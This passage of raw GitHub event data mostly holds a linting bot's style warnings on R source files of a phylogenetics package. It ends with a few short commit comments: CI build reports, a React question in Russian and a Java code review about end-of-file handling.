^\n```\n[R/assembleOperators.R:38:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:43:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:49:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:54:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​             \n^~~~~~~~~~~~~\n```\n[R/assembleOperators.R:56:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L56) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i == 1 ){\n        ^\n```\n[R/assembleOperators.R:56:16:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L56) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i == 1 ){\n               ^\n```\n[R/assembleOperators.R:59:20:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​      ops <- c(ops, \n                   ^\n```\n[R/assembleOperators.R:60:40:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​               list(xmlNode(\"operator\", \n                                       ^\n```\n[R/assembleOperators.R:61:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L61) *style:* **Lines should not be more than 80 characters.**\n```r\n​                            attrs = c(id = paste(\"StrictClockRateScaler.c:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:62:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L62) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                      parameter = paste(\"@clockRate.c:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:67:40:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L67) *style:* **Trailing whitespace is superfluous.**\n```r\n​               list(xmlNode(\"operator\", \n                                       ^\n```\n[R/assembleOperators.R:68:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L68) *style:* **Lines should not be more than 80 characters.**\n```r\n​                            attrs = c(id = paste(\"strictClockUpDownOperator.c:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:73:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L73) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                     attrs = c(idref = paste(\"clockRate.c:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:76:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L76) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                     attrs = c(idref = paste(\"Tree.t:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:77:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L77) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                               name = \"down\")))))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:80:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleOperators.R:84:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L84) *style:* **Trailing blank lines are superfluous.**\n```r\n​  \n^\n```\n[R/assembleOperators.R:85:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L85) *style:* **Trailing blank lines are superfluous.**\n```r\n​  \n^\n```\n[R/assembleStateNode.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleStateNode <- function(id){\n^~~~~~~~~~~~~~~~~\n```\n[R/assembleStateNode.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleStateNode.R:6:28:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​  state <- xmlNode(\"state\", \n                           ^\n```\n[R/assembleStateNode.R:9:8:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L9) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n       ^\n```\n[R/assembleStateNode.R:9:27:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L9) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n                          ^\n```\n[R/assembleStateNode.R:10:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleStateNode.R:13:36:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​    taxonset <- xmlNode(\"taxonset\", \n                                   ^\n```\n[R/assembleStateNode.R:14:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L14) *style:* **Lines should not be more than 80 characters.**\n```r\n​                          attrs = c(id = paste(\"TaxonSet.\", id[i], sep = \"\"), spec = \"TaxonSet\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleStateNode.R:17:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L17) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                             name = \"alignment\"))))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleStateNode.R:18:28:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​    tree <- xmlNode(\"tree\", \n                           ^\n```\n[R/assembleStateNode.R:22:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleStateNode.R:23:14:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L23) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​    state <- addChildren(state, kids = list(tree))\n             ^~~~~~~~~~~\n```\n[R/assembleStateNode.R:24:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleStateNode.R:27:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L27) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i > 1 ){\n        ^\n```\n[R/assembleStateNode.R:27:15:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L27) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i > 1 ){\n              ^\n```\n[R/assembleStateNode.R:31:16:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L31) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​      state <- addChildren(state, kids = list(br))\n               ^~~~~~~~~~~\n```\n[R/assembleStateNode.R:33:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L33) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleStateNode.R:39:14:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L39) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​    state <- addChildren(state, kids = list(br))\n             ^~~~~~~~~~~\n```\n[R/assembleStateNode.R:40:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleStateNode.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/code.simple.gaps.R:1:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L1) *style:* **Variable or function name should be snake_case.**\n```r\n​code.simple.gaps <- function(x, append = TRUE){\n^~~~~~~~~~~~~~~~\n```\n[R/code.simple.gaps.R:2:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L2) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:2:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:3:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L3) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tncha <- dim(x)[2]\n^\n```\n[R/code.simple.gaps.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L4) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tntax <- dim(x)[1]\n^\n```\n[R/code.simple.gaps.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L5) *style:* **Use spaces to indent, not tabs.**\n```r\n​\thh <- vector()\n^\n```\n[R/code.simple.gaps.R:6:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L6) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tfor (i in 1:ncha){\n^\n```\n[R/code.simple.gaps.R:7:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L7) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\tif (\"-\" %in% as.character(x[,i]))\n^~\n```\n[R/code.simple.gaps.R:7:32:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L7) *style:* **Commas should always have a space after.**\n```r\n​\t\tif (\"-\" %in% as.character(x[,i]))\n                               ^\n```\n[R/code.simple.gaps.R:8:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L8) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\thh <- c(hh, i)\n^~\n```\n[R/code.simple.gaps.R:9:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L9) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t}\n^\n```\n[R/code.simple.gaps.R:10:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L10) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:10:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:11:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L11) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t# list of gaps\n^\n```\n[R/code.simple.gaps.R:12:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L12) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tL <- list(length = 100)\n^\n```\n[R/code.simple.gaps.R:12:2:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L12) *style:* **Variable or function name should be snake_case.**\n```r\n​\tL <- list(length = 100)\n ^\n```\n[R/code.simple.gaps.R:13:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L13) *style:* **Use spaces to indent, not tabs.**\n```r\n​\ti <- 1\n^\n```\n[R/code.simple.gaps.R:14:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L14) *style:* **Use spaces to indent, not tabs.**\n```r\n​\twhile (length(hh) >= 1){\n^\n```\n[R/code.simple.gaps.R:15:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L15) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:15:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:16:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L16) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tgap <- hh[1]\n^\n```\n[R/code.simple.gaps.R:17:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L17) *style:* **Use spaces to indent, not tabs.**\n```r\n​\thh <- hh[-1]\n^\n```\n[R/code.simple.gaps.R:18:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L18) *style:* **Use spaces to indent, not tabs.**\n```r\n​\twhile (hh[1] - tail(gap, n = 1) == 1 && length(hh) > 0){\n^\n```\n[R/code.simple.gaps.R:19:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L19) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\tgap <- c(gap, hh[1])\n^~\n```\n[R/code.simple.gaps.R:20:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L20) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\thh <- hh[-1]\n^~\n```\n[R/code.simple.gaps.R:21:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L21) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t}\n^\n```\n[R/code.simple.gaps.R:22:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L22) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tL[[i]] <- gap\n^\n```\n[R/code.simple.gaps.R:23:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L23) *style:* **Use spaces to indent, not tabs.**\n```r\n​\ti <- i + 1\n^\n```\n[R/code.simple.gaps.R:24:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L24) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t}\n^\n```\n[R/code.simple.gaps.R:25:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L25) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:25:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/code.simple.gaps.R:26:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L26) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tsimple.gaps <- vector()\n^\n```\n[R/code.simple.gaps.R:26:2:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L26) *style:* **Variable or function name should be snake_case.**\n```r\n​\tsimple.gaps <- vector()\n ^~~~~~~~~~~\n```\n[R/code.simple.gaps.R:27:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L27) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tgap.content <- matrix(nrow = ntax)\n^\n```\n[R/code.simple.gaps.R:27:2:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L27) *style:* **Variable or function name should be snake_case.**\n```r\n​\tgap.content <- matrix(nrow = ntax)\n ^~~~~~~~~~~\n```\n[R/code.simple.gaps.R:28:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L28) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tfor (j in seq(along = L)){\n^\n```\n[R/code.simple.gaps.R:29:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L29) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\tgap <- L[[j]]\n^~\n```\n[R/code.simple.gaps.R:30:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L30) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\n^~\n```\n[R/code.simple.gaps.R:30:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/code.simple.gaps.R:31:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L31) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\tif (length(gap) == 1){\n^~\n```\n[R/code.simple.gaps.R:32:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L32) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tsimple.gaps <- c(simple.gaps, j)\n^~~\n```\n[R/code.simple.gaps.R:32:4:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L32) *style:* **Variable or function name should be snake_case.**\n```r\n​\t\t\tsimple.gaps <- c(simple.gaps, j)\n   ^~~~~~~~~~~\n```\n[R/code.simple.gaps.R:33:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L33) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff <- as.character(x[, gap])\n^~~\n```\n[R/code.simple.gaps.R:34:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L34) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff[ff != \"-\"] <- \"a\"\n^~~\n```\n[R/code.simple.gaps.R:35:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L35) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff[ff == \"-\"] <- \"g\"\n^~~\n```\n[R/code.simple.gaps.R:36:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L36) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tgap.content <- cbind(gap.content, ff)\n^~~\n```\n[R/code.simple.gaps.R:36:4:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L36) *style:* **Variable or function name should be snake_case.**\n```r\n​\t\t\tgap.content <- cbind(gap.content, ff)\n   ^~~~~~~~~~~\n```\n[R/code.simple.gaps.R:37:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L37) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t}\n^~\n```\n[R/code.simple.gaps.R:38:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L38) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\telse {\n^~\n```\n[R/code.simple.gaps.R:39:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L39) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff <- as.character(x[, gap])\n^~~\n```\n[R/code.simple.gaps.R:40:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L40) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff[ff != \"-\"] <- \"a\"\n^~~\n```\n[R/code.simple.gaps.R:41:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L41) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff[ff == \"-\"] <- \"g\"\n^~~\n```\n[R/code.simple.gaps.R:42:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L42) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff <- t(ff)\n^~~\n```\n[R/code.simple.gaps.R:43:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L43) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tcolnames(ff) <- NULL\n^~~\n```\n[R/code.simple.gaps.R:44:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/code.simple.gaps.R#L44) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\t\tff <- unique(ff)\n^~~\n```\n"}},"created_at":"2018-07-05T15:18:09Z"}
{"id":"7923903384","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29608256,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-05T15:18:33Z","updated_at":"2018-07-05T15:18:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T15:18:33Z"}
{"id":"7923903903","type":"CommitCommentEvent","actor":{"login":"ZzBoyHnzZ"},"repo":{"name":"ZzBoyHnzZ/GitTut"},"payload":{"comment":{"id":29608258,"position":2,"line":2,"path":"gitdema.txt","commit_id":"d6c9a87af56e1537434521ae12d0dbabb3a53958","created_at":"2018-07-05T15:18:38Z","updated_at":"2018-07-05T15:18:38Z","author_association":"OWNER","body":"new lines"}},"created_at":"2018-07-05T15:18:38Z"}
{"id":"7923906674","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29608265,"position":null,"line":null,"path":null,"commit_id":"397f3954092b37ee234312e44b81b0877034c6b4","created_at":"2018-07-05T15:19:07Z","updated_at":"2018-07-05T15:19:07Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 683](https://travis-ci.org/per1234/arduino-ci-script/builds/400480878) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00683-001-tsv"}},"created_at":"2018-07-05T15:19:07Z"}
{"id":"7923906929","type":"CommitCommentEvent","actor":{"login":"paravmellanox"},"repo":{"name":"jellonek/netlink"},"payload":{"comment":{"id":29608266,"position":null,"line":null,"path":null,"commit_id":"a74caa6f29c2ad31f7909e00b760f6bc888177dc","created_at":"2018-07-05T15:19:09Z","updated_at":"2018-07-05T15:19:09Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-05T15:19:09Z"}
{"id":"7923907001","type":"CommitCommentEvent","actor":{"login":"IrinaKondrateva"},"repo":{"name":"IrinaKondrateva/june-loftschool-react-homeworks"},"payload":{"comment":{"id":29608267,"position":48,"line":27,"path":"src/components/ShowPage/ShowPage.js","commit_id":"3febcad07cd6d65cba6a7b86a9acdc4d19e15ece","created_at":"2018-07-05T15:19:10Z","updated_at":"2018-07-05T15:19:10Z","author_association":"OWNER","body":"Если не делать проверку на наличие, то все рухнет. Это из-за того, что асинхронный запрос и данные не сразу все приходят? Аналогичная картина с image. При этом id, name, summary сразу доступны без проверки. image и embedded - объекты."}},"created_at":"2018-07-05T15:19:10Z"}
{"id":"7923907210","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"stefanofornari/BshConsole"},"payload":{"comment":{"id":29608268,"position":166,"line":166,"path":"src/main/java/bsh/BshConsoleInterpreter.java","commit_id":"0d2b1e9da18126ea1aa2df392e498fedd7acb66f","created_at":"2018-07-05T15:19:11Z","updated_at":"2018-07-05T15:19:11Z","author_association":"OWNER","body":"Hi @nickl- I am trying to merge the changes above, please see my comments\nbelow:\n\n- line 485: if ( !interactive || !e.getMessage().contains(\"<EOF>\") ) don't\nwe have already a more reliable way to know if EOF has been reached being\neof true? I would not recommend to relay on the message.\n\n- line 987:  private boolean isEOF() throws ParseException {\n        return parser.Line();\n    }\nto be honest I find more understandble Line(). any particular reason for\nthe change?\n\nHope this helps.\n\n\nSte\n\nOn Thu, Jul 5, 2018 at 12:14 AM, Nick Lombard <notifications@github.com>\nwrote:\n\n> All removed this... the java docs state we should not be yielding and the\n> with or without the flushing the results appear the same so I figure this\n> is again some java 1.1 1.2 legacy 